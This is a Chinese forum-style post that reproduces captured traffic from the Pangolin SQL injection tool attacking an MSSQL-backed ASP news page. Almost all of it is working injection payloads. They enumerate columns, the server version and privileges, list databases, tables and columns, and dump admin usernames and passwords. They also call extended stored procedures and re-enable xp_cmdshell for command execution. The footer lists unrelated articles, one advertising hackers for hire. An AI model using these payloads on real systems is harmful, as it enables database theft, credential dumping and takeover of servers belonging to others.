穿山甲MSSQL注射抓包(部分)
作者:TheLostMind
看了下穿山甲,很牛X的工具,抓了下包,随便整理了以下,无聊时看看……
===============================================
Target url is : http://www.xxx.com/news.asp?class_id=1165
HTTP Method is : GET
Inject type is : Integer
Do you really want to delete it?
Field count is : 14
The field's count 14
The string field position at 2
抓包内容:
union all select null-- and 1=1
union all select null,null-- and 1=1
union all select null,null,null-- and 1=1
这里省略…………………………………………
union all select null,null,null,null,null,null,null,null,null,null,null,null,null-- and 1=1
union all select null,null,null,null,null,null,null,null,null,null,null,null,null,null-- and 1=1
and 1=2 union all select cast
(0x616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161 as varchar
(8000)),null,null,null,null,null,null,null,null,null,null,null,null,null-- and 1=1
and 1=2 union all select null,cast
(0x616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161 as varchar
(8000)),null,null,null,null,null,null,null,null,null,null,null,null-- and 1=1
and 1=2 union all select null,cast(db_name() as nvarchar
(4000)),null,null,null,null,null,null,null,null,null,null,null,null -- and 1=1
获取综合信息:
and 1=2 union all select null,cast(@@version as nvarchar
(4000)),null,null,null,null,null,null,null,null,null,null,null,null -- and 1=1
and 1=2 union all select null,cast(db_name() as nvarchar
(4000)),null,null,null,null,null,null,null,null,null,null,null,null -- and 1=1
and 1=2 union all select null,cast(@@servername as nvarchar
(4000)),null,null,null,null,null,null,null,null,null,null,null,null -- and 1=1
and 1=2 union all select null,cast(system_user as nvarchar
(4000)),null,null,null,null,null,null,null,null,null,null,null,null -- and 1=1
and 1=2 union all select null,cast(user as nvarchar
(4000)),null,null,null,null,null,null,null,null,null,null,null,null -- and 1=1
and 1=2 union all select null,cast(is_srvrolemember(0x730079007300610064006d0069006e00) as nvarchar
(4000)),null,null,null,null,null,null,null,null,null,null,null,null -- and 1=1
and 1=2 union all select null,cast(is_member(0x640062005f006f0077006e0065007200) as nvarchar
(4000)),null,null,null,null,null,null,null,null,null,null,null,null -- and 1=1
and 1=2 union all select top 1 null,cast(cast([name] as nvarchar(4000)) cast([filename] as nvarchar(4000)) as
nvarchar(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 dbid,name,filename
from (select top 1 dbid,name,filename from [master].[dbo].[sysdatabases] order by 1) t order by 1 desc)t-- and 1=1
and 1=2 union all select top 1 null,cast(cast([name] as nvarchar(4000)) cast([filename] as nvarchar(4000)) as
nvarchar(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 dbid,name,filename
from (select top 2 dbid,name,filename from [master].[dbo].[sysdatabases] order by 1) t order by 1 desc)t-- and 1=1
and 1=2 union all select top 1 null,cast(cast([name] as nvarchar(4000)) cast([filename] as nvarchar(4000)) as
nvarchar(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 dbid,name,filename
from (select top 3 dbid,name,filename from [master].[dbo].[sysdatabases] order by 1) t order by 1 desc)t-- and 1=1
and 1=2 union all select top 1 null,cast(cast([name] as nvarchar(4000)) cast([filename] as nvarchar(4000)) as
nvarchar(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 dbid,name,filename
from (select top 4 dbid,name,filename from [master].[dbo].[sysdatabases] order by 1) t order by 1 desc)t-- and 1=1
这里省略……………………
and 1=2 union all select top 1 null,cast(cast([name] as nvarchar(4000)) cast([filename] as nvarchar(4000)) as
nvarchar(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 dbid,name,filename
from (select top 40 dbid,name,filename from [master].[dbo].[sysdatabases] order by 1) t order by 1 desc)t-- and 1=1
;drop table foofoofoo;-- and 1=1
;create table foofoofoo(name nvarchar(255),low nvarchar(255),high nvarchar(255),type nvarchar(255));-- and 1=1
;insert foofoofoo exec master.dbo.xp_availablemedia;-- and 1=1
and 1=2 union all select top 1 null,cast(cast([name] as nvarchar(4000)) cast([type] as nvarchar(4000)) as nvarchar
(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 * from (select top 1 * from
foofoofoo order by [name] group by name) t order by [name] desc)t-- and 1=1
;drop table foofoofoo;-- and 1=1
;create table foofoofoo(name nvarchar(255),description nvarchar(4000));-- and 1=1
;insert foofoofoo exec master.dbo.xp_enumgroups;-- and 1=1
and 1=2 union all select top 1 null,cast(cast([name] as nvarchar(4000)) cast([description] as nvarchar(4000)) as
nvarchar(4000)) ,null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 * from (select top
1 * from foofoofoo order by [name] group by name) t order by [name] desc)t-- and 1=1
;drop table foofoofoo;-- and 1=1
获取表:
and 1=2 union all select null,cast(cast(count(*) as varchar(10)) as nvarchar
(4000)),null,null,null,null,null,null,null,null,null,null,null,null from [sky_yanjiusuo]..[sysobjects] where
xtype=char(85) and status>0--
and 1=2 union all select top 1 null,cast(cast(name as varchar(256)) as nvarchar
(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 id,name from (select top 1
id,name from [sky_yanjiusuo]..[sysobjects] where xtype=char(85) and status>0 order by 1) t order by 1 desc)t--
and 1=2 union all select top 1 null,cast(cast(name as varchar(256)) as nvarchar
(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 id,name from (select top 2
id,name from [sky_yanjiusuo]..[sysobjects] where xtype=char(85) and status>0 order by 1) t order by 1 desc)t--
这里省略………………
and 1=2 union all select top 1 null,cast(cast(name as varchar(256)) as nvarchar
(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 id,name from (select top 15
id,name from [sky_yanjiusuo]..[sysobjects] where xtype=char(85) and status>0 order by 1) t order by 1 desc)t--
获取列:
and 1=2 union all select top 1 null,cast(cast(id as nvarchar(20)) as nvarchar
(4000)),null,null,null,null,null,null,null,null,null,null,null,null from [sky_yanjiusuo]..[sysobjects] where
name=0x73006b0079005f005500730065007200--
and 1=2 union all select null,cast(cast(count(*) as varchar(10)) as nvarchar
(4000)),null,null,null,null,null,null,null,null,null,null,null,null from [sky_yanjiusuo]..[syscolumns] where
id=2068202418--
and 1=2 union all select top 1 null,cast(cast(name as varchar(8000)) as nvarchar
(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 colid,name from (select top
1 colid,name from [sky_yanjiusuo]..[syscolumns] where id=2068202418 order by 1) t order by 1 desc)t--
and 1=2 union all select top 1 null,cast(cast(name as varchar(8000)) as nvarchar
(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 colid,name from (select top
2 colid,name from [sky_yanjiusuo]..[syscolumns] where id=2068202418 order by 1) t order by 1 desc)t--
这里省略……………………
and 1=2 union all select top 1 null,cast(cast(name as varchar(8000)) as nvarchar
(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 colid,name from (select top
10 colid,name from [sky_yanjiusuo]..[syscolumns] where id=2068202418 order by 1) t order by 1 desc)t--
and 1=2 union all select top 1 null,cast(cast(name as varchar(8000)) as nvarchar
(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 colid,name from (select top
11 colid,name from [sky_yanjiusuo]..[syscolumns] where id=2068202418 order by 1) t order by 1 desc)t--
获取内容:
and 1=2 union all select null,cast(cast(count(*) as varchar(8000)) as nvarchar
(4000)),null,null,null,null,null,null,null,null,null,null,null,null from [sky_yanjiusuo]..[sky_user] where 1=1--
and 1=2 union all select top 1 null,cast(cast(id as varchar) as nvarchar
(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 id from (select top 1 id
from [sky_yanjiusuo]..[sky_user] where 1=1 order by 1) t order by 1 desc)t--
and 1=2 union all select top 1 null,cast(cast(admin_name as varchar) as nvarchar
(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 admin_name from (select top
1 admin_name from [sky_yanjiusuo]..[sky_user] where 1=1 order by 1) t order by 1 desc)t--
and 1=2 union all select top 1 null,cast(cast(admin_password as varchar) as nvarchar
(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 admin_password from (select
top 1 admin_password from [sky_yanjiusuo]..[sky_user] where 1=1 order by 1) t order by 1 desc)t--
and 1=2 union all select top 1 null,cast(cast(id as varchar) as nvarchar
(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 id from (select top 2 id
from [sky_yanjiusuo]..[sky_user] where 1=1 order by 1) t order by 1 desc)t--
and 1=2 union all select top 1 null,cast(cast(admin_name as varchar) as nvarchar
(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 admin_name from (select top
2 admin_name from [sky_yanjiusuo]..[sky_user] where 1=1 order by 1) t order by 1 desc)t--
and 1=2 union all select top 1 null,cast(cast(admin_password as varchar) as nvarchar
(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 admin_password from (select
top 2 admin_password from [sky_yanjiusuo]..[sky_user] where 1=1 order by 1) t order by 1 desc)t--
恢复XP_CMDSHELL:
and substring(cast(serverproperty(0x700072006f006400750063007400760065007200730069006f006e00) as nvarchar(4000)),
1, 1)>8
;exec master.dbo.sp_addextendedproc 0x780070005f0063006d0064007300680065006c006c00,
0x780070006c006f006700370030002e0064006c006c00--
恢复SP_OA……
;exec master.dbo.sp_addextendedproc 0x730070005f004f004100430072006500610074006500,
0x780070006c006f006700370030002e0064006c006c00--
列磁盘:
;drop table foofoofoo;--
;create table foofoofoo(name nvarchar(255),low nvarchar(255),high nvarchar(255),type nvarchar(255));--
;insert foofoofoo exec master.dbo.xp_availablemedia;--
and 1=2 union all select top 1 null,cast(cast([name] as nvarchar(4000))cast([type] as nvarchar(4000)) as nvarchar
(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 * from (select top 1 * from
foofoofoo order by [name] group by name) t order by [name] desc)t--
;drop table foofoofoo;--
不抓了。。。。自己抓吧………………
==============================================
相关文章
微信记录同步会覆盖吗_微信记录同步登录
微信记录同步会覆盖吗_微信记录同步登录 Twilio正在使开发人员更容易构建应用程序,以响应人们在电话中所说的话,周三宣布了一项新功能。该公司的自动语音识别测试版将接听来电者的演讲并将其转换为文本。...
有谁知道怎么找黑客办事(有信誉的黑客联系方式)_黑客
黑客是对任何电脑操纵体系的秘密事情方法最感乐趣的人。黑客平时是法式员。他们网页操纵体系和编程说话的高档常识,以找出体系的外部毛病以及这些毛病的缘故。 普通说来,黑客有10种,划分是: 怎么找黑客办...
男子吸毒被抓牵出"黑客"身份 曾入侵省安监局官网_微软
出租屋内,涉嫌吸食毒品的铁某被公安民警控制,在对其住所进行搜查期间,一台电脑引起了民警的注意,通过对该电脑的数据勘验,牵出了一起案中案。近日,湖北钟祥市人民检察院依法以涉嫌非法侵入计算机信息系统罪对犯...
微信聊天记录监控_微信聊天记录监控软件是真的吗?这个你都听说了吗?
随着网络的快速发展,使用微信的用户越来越多,而且适用范围非常的广,从小学生到老人几乎是人人都会使用了,再微信中存在着很多人的秘密和隐私,一般情况下是不能够给他人知道自己的聊天记录的,毕竟微信中的微信支...
易到:CEO欺凌员工一事纯属污蔑,吕艺已经离职_你可以
新浪科技报道,针对网传易到政府事务总监吕艺炮轰CEO巩振兵欺凌员工一事,易到方面回应称纯属污蔑,但证实吕艺已经离职。一张流传的邮件截图显示,易到政府事务部总监吕艺在一封邮件中炮轰易到CEO巩振兵,称巩...
域名投资赚钱知识汇总
域名抢注知识 所谓抢注,简单地划分,有两种意义上的抢注: 1.一个从未被注册过的域名的抢注。 这种情况下,一般是域名的注册者预见到该域名潜在的价值,在其他人想到之前把该域名注册下来。此范围...
Copyright Your WebSite.Some Rights Reserved.
免责声明:本站所发布的任何网站,全部来源于互联网,版权争议与本站无关。仅供技术交流,如有侵权或不合适,请联系本人进行删除。不允许做任何非法用途!